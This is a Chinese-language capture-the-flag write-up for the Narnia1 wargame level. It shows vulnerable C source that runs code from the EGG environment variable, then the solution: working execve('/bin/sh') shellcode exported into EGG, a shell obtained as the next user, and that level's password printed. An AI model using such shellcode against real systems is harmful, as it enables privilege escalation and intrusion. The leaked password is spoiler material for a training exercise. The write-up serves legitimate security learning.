Narnia1的源码如下
/* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ #include <stdio.h> int main(){ int (*ret)(); if(getenv("EGG")==NULL){ printf("Give me something to execute at the env-variable EGG\n"); exit(1); } printf("Trying to execute EGG!\n"); ret = getenv("EGG"); ret(); return 0; }
很明显,如果能修改EGG环境变量直接执行’/bin/sh’,就能拿到root,而之前的番外篇里已经介绍过如何写一个能得到root权限的shellcode了,解题过程如下
narnia1@narnia:/narnia$ export EGG=$(python -c 'print "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x8d\x4e\x08\x89\x46\x0c\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"') narnia1@narnia:/narnia$ ./narnia1 Trying to execute EGG! $ whoami narnia2 $ cat /etc/narnia_pass/narnia2 nairiepecu $
小结
narnia系列的所以的题目都是有源码的,相对别的CTF题目来说上手难度低很多,而且题目难度都是循序渐进的,对新人很友好,这是我解题时参考的文章链接(没错,我也是新人),附件是narnia1的源码和可执行代码